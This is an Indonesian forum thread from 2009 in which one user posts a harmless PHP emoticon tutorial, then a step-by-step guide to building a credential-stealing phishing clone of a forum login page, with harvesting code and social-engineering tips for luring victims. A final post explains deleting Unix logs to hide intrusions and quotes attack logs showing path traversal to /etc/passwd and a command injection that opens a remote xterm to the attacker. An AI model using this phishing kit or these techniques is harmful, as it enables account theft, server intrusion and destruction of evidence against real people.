Trick And Information
☼ WELCOME IN PROFILE OPAMA FORUM ☼

Forum Orang Indo..!
Forum Orang Kreative..!

Salam Persaudaraan

Just For Fun

Trick And Information
☼ WELCOME IN PROFILE OPAMA FORUM ☼

Forum Orang Indo..!
Forum Orang Kreative..!

Salam Persaudaraan

Just For Fun

Trick And Information
Would you like to react to this message? Create an account in a few clicks or log in to continue.


This Forum from http://opa-ma.blogspot.com
 
HomeHome  Latest imagesLatest images  SearchSearch  RegisterRegister  Log inLog in  

 

 W3bS1tE tuToR14L

Go down 
AuthorMessage
Yesi

Yesi


Posts : 9
Join date : 2009-04-21
Age : 30
Location : Cuyabaya

W3bS1tE tuToR14L Empty
PostSubject: W3bS1tE tuToR14L   W3bS1tE tuToR14L Icon_minitimeTue Apr 21, 2009 4:15 pm

ak Nnnnnnis folum Embarassed

qyu sring liat blog punya ak2 yg http://opa-ma.co.cc

qyu lg blajar nui


W3bS1tE tuToR14L Motlea10


Mejeng dikit ya akkk

Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed Embarassed


Last edited by Yesi on Wed Jun 10, 2009 1:59 pm; edited 1 time in total
Back to top Go down
Yesi

Yesi


Posts : 9
Join date : 2009-04-21
Age : 30
Location : Cuyabaya

W3bS1tE tuToR14L Empty
PostSubject: Re: W3bS1tE tuToR14L   W3bS1tE tuToR14L Icon_minitimeTue Jun 09, 2009 5:07 pm

Bikin Emoticon di PHP MAs-MAs


Halo halo, udah lama rasanya gak nulis dimari



Kali ini ane mo nulis artikel sederhana, gimana cara fetching/parsing/ngambil emoticon-emoticon yang disimpan dalam database,



terus ngeganti simbol-simbol tertentu dalam teks dengan file image emoticon. Okeh langsung aja.






*

Pertama, yang udah pasti, bikin tabel dengan nama emoticon, field-nya cuma dua: "id" dengan "alt". Supaya praktis eksekusi aja langsung code di bawah di phpMyAdmin.





CREATE TABLE `db_ente`.`emoticon` (



`id` INT NOT NULL AUTO_INCREMENT ,



`alt` VARCHAR( 100 ) NOT NULL ,



PRIMARY KEY ( `id` )



) ENGINE = MYISAM





Jangan lupa ganti `db_ente` dengan nama database yang ada di komputer ente. Kalau belum ada bisa dibikin dulu dengan kode di bawah.







CREATE DATABASE `nama_db` ;







*

Database beres, sekarang tinggal masukkin datanya, karna cuma untuk coba-coba, masukkin aja satu record dulu.





INSERT INTO `db_ente`.`emoticons` (



`id` ,



`alt`



)



VALUES (



NULL , 'Laughing'



);





Dengan query di atas kita masukkin alt emoticon "Laughing" (lol = laughing out loud)







*

Untuk image animasi emoticon yang mewakili simbol "lol", bikin/copy image yang diinginkan ke direktori emoticon/lol.gif. Jadi di direktori yang sama dengan file utama, bikin direktori emoticon, trus copy file image dengan nama "lol.gif" (haduh ribet gw ngomongnya). Ane sendiri untuk contoh ini make animasi dari Plurk yang ini.







*

Sekarang, fungsi dalam PHP untuk fetching emoticon:





function fetch_emo($strnya) {



$hsl = $strnya;







$qE = mysql_query("SELECT * FROM emoticon") or die(mysql_error());



while ($aE = mysql_fetch_array($qE)) {



$offst = substr($aE["alt"], 1);



$img = "<img src="emoticon/" . substr($offst, 0, -1) . ".gif" border="0" alt="emotion" />";







$hsl = str_replace($aE["alt"], $img, $hsl);



}







return $hsl;



}







*

Terakhir, implementasi.







<?



mysql_connect("localhost", "user", "password") or die(mysql_error()); //ganti sesuai MySQL ente



mysql_select_db("db_ente") or die(mysql_error());



?>



<html>



<head>



<title>Test Emoticon</title>



</head>



<body>



<?



$str_test = "Test kacang euy Laughing";



$sesudah = fetch_emo($str_test);



echo "Sebelum: $str_test<br /><br />";



echo "Sesudah: $ssd";



?>



</body>



</html>





Hasilnya:



Sebelum: Test kacang euy Laughing





Sesudah: Test kacang euy







Sekarang, ane jelasin dikit cara kerjanya.



Di langkah pertama dan kedua, kita mempersiapkan database yang mo dipake untuk nyimpan string tertentu yang mo di-replace dengan emoticon.



Karna disimpan dalam database, kita bisa dengan mudah ngapus atau nambah emoticon-emoticon baru.



Dalam fungsi fetch_emo() yang kita bikin di langkah ke-4, kita melakukan query ke database, dan nge-parse satu-satu string emoticon (dalam contoh di atas "Laughing"), trus diganti dengan image di direktori emoticon/lol.gif. Nah, mungkin pada bertanya, lol.gif dapet dari mana ?? Dalam fungsi ini, supaya kita gak perlu repot-repot mendefinisikan path image, ane bikin path imagenya diambil dari string di antara titik dua (":") ditambah dengan ekstensi ".gif", sehingga kalo string emoticon-nya "Laughing", berarti path image-nya adalah "lol.gif". lol!



Okeh, ampe sgini aja, klo masih ada pertanyaan silakan komen di sini.
Back to top Go down
Yesi

Yesi


Posts : 9
Join date : 2009-04-21
Age : 30
Location : Cuyabaya

W3bS1tE tuToR14L Empty
PostSubject: Re: W3bS1tE tuToR14L   W3bS1tE tuToR14L Icon_minitimeTue Jun 09, 2009 5:20 pm

Phising Forum mAs-MAs


Hey all ...
ketemu lagi dengan gue.... Spa yach gue W3bS1tE tuToR14L Icon_razz
setelah
gue mengganti username sekarang gue ingin jelasin gimana sih caranya
membuat forum phiser trus tentu cara menggunakan dengan baik dan
benar...

nah kita mulai saja...

pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt

nah pada file next.php masukkan code ini
Code: $datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>

atau untuk lebih memudahkan anda saya sudah sedian disini...
Code: http://www.mediafire.com/?diddyvyxkwo

setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..W3bS1tE tuToR14L Icon_e_biggrin" title="Very Happy" />
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)

copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"

dengan itu password log akan disafe di file ppp.txt

sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)

setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url

terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:

kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css

nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...

selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....


nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan W3bS1tE tuToR14L Icon_razz)

1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).

nah ini contoh yang sering gue pake di forum luar sana
"Hey is this yours post?" atau "Did you uploaded this?" trus gue masukin deh
[url=phising link anda]contoh link yang ditujuh[/url]


oke demikian dari saya... maap klo kurang jelas...( gue bukan penulis yang handal W3bS1tE tuToR14L Icon_e_sad" title="Sad" /> W3bS1tE tuToR14L Icon_e_sad" title="Sad" /> W3bS1tE tuToR14L Icon_e_sad" title="Sad" /> )
and terakhir selamat berburu Vip/staff/moderator/ member yach..W3bS1tE tuToR14L Icon_e_biggrin" title="Very Happy" />
ingat klo berhasil bagi2 disini W3bS1tE tuToR14L Icon_razz
Back to top Go down
Yesi

Yesi


Posts : 9
Join date : 2009-04-21
Age : 30
Location : Cuyabaya

W3bS1tE tuToR14L Empty
PostSubject: Re: W3bS1tE tuToR14L   W3bS1tE tuToR14L Icon_minitimeTue Jun 09, 2009 5:25 pm

Menghapus jejak meninggalkanmu




Hmmmm,..mo tanya, ini kaya judul lagunya band apa yach??? Laughing Rolling Eyes
Upst,.tapi ada hubungannya loh lagu diatas sama masalah hacking pada
mesin *nix, loh..loh..loh..lagu sama hacking,dimana bunga hubungannya???

Okey deyh,daripada bunga dibilang size bajunya L alias Lebai , langsung ajah deyh di ulas dikit-dikit.

.log file ??? ini sebuah file yang berisi tentang catatan apapun yang
dilakukan oleh siapapun dalam sebuah mesin. Untuk bisa mengakses ini
yang dibutuhkan adalah anda sebagai root/SU. File ini bisa dibuka atau
diedit dengan cara menggunakan text editor dan hexa editor sesuai
dengan jenis/macamnya. Loh kok macamnya??? Emangnya ada berapa macam
yang sich log file itu???

Ini macem ato jenis dari dari file
log itu, tapi kalo ada kesalahan mohon maaf dan di koreksi yach
temen-temen,bunga masih belajar

1. .history: mencatat semua
hal yang dilakukan oleh user, biasanya tersimpan dalam directory user.
Sangat mudah dihapus ato di edit, asalkan kita sebagai SU statusnya.
2. acct ato pact: mencatat semua hal yang dilakukan oleh user, tetapi
tidak mencatat program yang dijalankan oleh user, ini hanya catatan
harian sebuah mesin, jadi ukuran file bisa bertambah besar setiap
harinya. Biasanya terletak pada /var/adm/savacct.
3. access_log:
mencatat access file pada www seperti: pemanggilan hostname, remote
login, waktu access dan perintah-perintah pada http, digunakan pada
NCSA httpd server. Biasanya berupa text biasa, sangat mudah diedit
hanya menggunakan text editor.
4. aculog: mencatat pemakaian modem.
5. lastlog: mencatat user yang login,baik yang masuk ato gagal login.
Didalemnya terekam IP address dari user tersebut.sangat mudah
dihapus,pake coomannd ajah lsg terhapus kok.
6. loginlog: mencatat
hanya user yang gagal login biasanya setelah 5 kali percobaan gagal
login baru tercatat. Bentuknya hanya file text bisa, jadi sangat mudah
dihapus ato diedit.
7. messages: mencatat hasil apapun yang
dikeluarkan oleh syslog. Bentuknya hanya file text bisa, jadi sangat
mudah dihapus ato diedit.
8. sulog: mencatat apapun yang dilakukan oleh su. Bentuknya hanya file text bisa, jadi sangat mudah dihapus ato diedit.
9. utmp: mencatat siapa saja yang sedang login ato berada dalam sebuah
mesin. Biasanya menggunakan command who untuk mengetahui penyusup yang
sedang asik-asikan didalam mesin. File ini berekstensi utmpx.
10. wtmp: mencatet user yang login menggunakan ftp,berekstensi wtmpx, dan menggunakan hexaeditor untuk mengeditnya.
11. vold.log: mencatat error pada mesin yang menggunakan media external,contoh cd room, floppy, dsb.
12. xferlog: mencatat penggunaan ftp (hampir sama spt wmtp).
13. syslog:

Setelah kita mengetahui sedikit tentang macam-macamnya lalu kita akan
mencoba telusuri lebih dalam lagi,.semua file diatas terangkum dalam
sebuah file yang dinamakan syslog. Syslog ini mempunyai daemon yang
berguna sebagai ?jantungnya? dinamakan syslogd. Sewaktu syslog ini
berjalan dia akan menuju file conf yang terletak pada /etc/syslog.conf
yang membaca dari tiga buah report yang dikeluarkan oleh:
a. /dev/klog(membaca kernel report)
b. /dev/log(membaca report program yang berjalan pada local mesin)
c. UDP port 514(membaca report program yang berjalan pada network)
So sedikit kita sudah mengetahui tentang file log ini,..tapi?dimanakah
file tersebut berada??? Untuk hal yang satu ini tempatnya abstrak alias
bisa dipindah-pindah, admin yang topcer biasanya menyembunyikan file
ini dalam brangkasnya,..hehehehehhe..gak mungkin lah Bunga, iya gak
mungkin dalam brangkas siy, tapi memang diumpetin serapat-rapatnya
serahasia hanya admin dan Tuhan yang mengetahuinya. Tapi jangan sedih
dulu, menurut pengalaman Bunga, Masih banyak admin yang teledor dengan
asumsi masih diparkirkan pada tempat defaultnya,?because secure is not
default?ntu kata hacker inggris, tapi Bunga lupa Nicknya .
Tempatnya file log dari pengalaman Bunga:
? /usr/adm
? /var/adm
? /var/log
Sekali lagi ini gak mutlak loh,.kalo mo jelas,datengin ajah adminnya
Tanya passnya,Tanya file lognya, terus minta ijin ajah sekalian pake
mesinnya,kalo yang ini halal 100%,.hehehehehehe,.becanda

Dah
ketemu file lognya tapi cara membersihkannya bagaimana yach???masnya
ambil kain basah lalu lap ajah monitornya, siapa tau bisa
bersih,.hehehehehehe,.becanda lagi ding 
Caranya pake perintah rm
?rf, syntak: command [patch], contoh: rm ?rf /var/log/wmtp, ato juga
menggunakan text editor sepert vi / nano / pico, cukup hapus baris
datanya saja, kurang lebih sama seperti konfigurai dual boot lilo

Yach, sekarang kita lanjutkan lagi, tapi dah pada capek yach,.bikin
teh, kopi, or susu jangan lupa cemilannya yach, biar tambah
semangat,.GO..GO..GO..

Okey sekarang kita mencoba membedah
file log untuk mengetahui vulnerbilty pada mesin kita,.sebelumnya,
sekali lagi maafkan Bunga jika ada kesalahan, mas, om, mba, tante,
kakak, yang lebih senior dan jago Bunga minta ijin,.?satu guru satu
ilmu dilarang saling menggangu?,.hehehehehehehe,?

Berikut
ini contoh kasus pada http://www.c**.co.id, Bunga pernah melakukan
forensic pada mesin servernya, web programernya menggunakan script CGI
Perl, Servernya diobrak-abrik oleh craker gila, tapi dia agak sembrono
dimana dia tidak menghapus track nya pada access_log,(untuk IP nya
disamarkan):

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / HTTP/1.0? 200 3008
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / A1.jpg HTTP/1.0? 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / V90.jpg HTTP/1.0? 200 6943
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / RG7.jpg HTTP/1.0? 200 9854

Penjelasan: Attacker dengan no Ip 10.0.*.**, dia hanya melihat-lihat
web ini pada halaman utama dan kejadian ini dicatet pada jam 01:02:45.

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=contact.shtml HTTP/1.0? 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / NOW.jpg HTTP/1.0? 200 3456
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=layanan.shtml HTTP/1.0? 200 309
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / 9RG7.jpg HTTP/1.0? 200 9854

Penjelasan: Masih sulit apa maksudnya attacker dikarena dia masih melihat-lihat dan mencoba link pada web ini.

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / cgi-bin/ HTTP/1.0? 403 272

Penjelasan: Attacker mulai beraksi, dia mencoba mengakses direktory
/cgi-bin/ dan hal hasil yang ditemukannya adalah 403, apa siy artinya
403??? forbiden cuy,. 

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi HTTP/1.0? 200 3009
10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=index.cgi HTTP/1.0? 200 399

Penjelasan: Attacker melanjutkan serangannya lagi, sekarang dia
mengikuti pola link yang telah lihatnya. Peratama ia memasukan
http://www.c**.co.id/index.cgi lalu ia mencoba lagi mamasukan
http://www.c**.co.id/index.cgi?page=index.cgi.
Nah dari sini si
attacker dapat melihat script index.cgi nya, dari mana ia melihatnya???
Yach dari browsernya lah,.scriptnya tampil di browser .
Kenapa ini bisa terjadi???
Attacker meneliti index.cgi menerima sebuah nama file sebagai seuatu
parameter dan memperlihatkan isi dari file tersebut. Disini attacker
menggunakan index.cgi itu sendiri untuk menampilkan source codenya.

Source code:

01: #! /usr/bin/perl
02: # perl script to display a page back as requested by the argument
03:
04: require ?../cgi-bin/cgi-lib.pl?;
05:
06: &ReadParse(*input);
07:
08: $namafile = $input{page};
09: if ($namafile eq ??) {
10: $namafile = ?main.html?;
11: }
12:
13: print &PrintHeader;
14:
15: $namafile = ? /usr/local/apache/htdocs/? . $namafile;
16: open(FILE, $namafile);
17: while(){
18: print $_;
19: }
20: close(file);

Sekarang kita ulas dan pelajari,.bugs nya terdapat pada validasi untuk
parameter-parameter yang akan dilewatkan ke script index.cgi. Filename
yang dilewatkan sebagai parameter dari url ditangkap sebagai sebuah
variabel $namafile pada baris 08, ditambahkan ke path absolut?
usr/local/apache/htdocs? pada baris 15, dan ditampilkan pada baris 16.
Berarti,...yups betul,.kita bisa dengan mudah mengambil file dari server web 

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0? 200 786

Penjelasan: Sekarang attacker mencoba mencari password,.Wow...

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=|ls -la /
id
which xterm| HTTP/1.0? 200 1399

10.0.*.** - - [24/Oct/2008:01:02:45 0530] ?GET / index.cgi?page=|xterm display 10.0.*.**:0.0 &| HTTP/1.0? 200

Penjelasan: Rupanya ini attacker mengerti tentang unix dan perl,
sekarang dia tidak berusaha membuka file dikarenakan dia sekarang
menggunakan karakter pipa?|? diikuti dengan command-command pilihannya.
Dengan demikian, perl membuka kendali filenya yang dapat menerima
output standar hasil dari command-command yang dituliskan pada
parameter filename. Disini attacker meminta 2 buah request:
http://www.c**.co.id/index.cgi?page=|ls ... ich xterm|
disini jelas attacker sebenernya mengeksekusi coomand ls ?la/ , id,
which xterm,.apa yang didapet dari attacker mengeksekusi coomand
tersebut???
Yang didapet adalah: menampilkan daftar file pada
direktory root dengan perintah ls ?la/, mendapatkan id user yang
efektif pada proses eksekusi index.cgi dengan perintah id, dan yang
terkahir mendapatkan path xtrem biner dari perintah ?which xterm?.
Request yang kedua:
http://www.c**.co.id/index.cgi?page=|xt ... *:0.0 &|
attacker menjalankan command ?xterm ? display 10.0.*.**:0.0&?ini
berarti dia menjalankan window xterm pada mesin attacker. Lalu apa yang
dilakukan???yach udah masukin user, trus pass, masuk deyh,. .
Dari sini kita dapet mengetahui bugs pada mesin kita dengan melihat log yang ditinggalkan oleh attacker.
Yach,.segitu ajah dari bunga tentang menghapus jejak dan buka-bukaan file log tuk dapet vulnerbilty sebuah mesin.
Semoga ajah tulisan ini bermanfaat untuk kemajuan IT security
Indonesia.Mohon dikoreksi lagi para senior ato orang-orang yang jago
dalam bidang ini,dikarenakan Bunga masih belajar,.
Makacih buat semua orang yang ada didunia dan temen-temen semua di forum,.
Salam hangat
Bungaputrilanacita
Back to top Go down
Sponsored content





W3bS1tE tuToR14L Empty
PostSubject: Re: W3bS1tE tuToR14L   W3bS1tE tuToR14L Icon_minitime

Back to top Go down
 
W3bS1tE tuToR14L
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Trick And Information :: Ruang Design-
Jump to: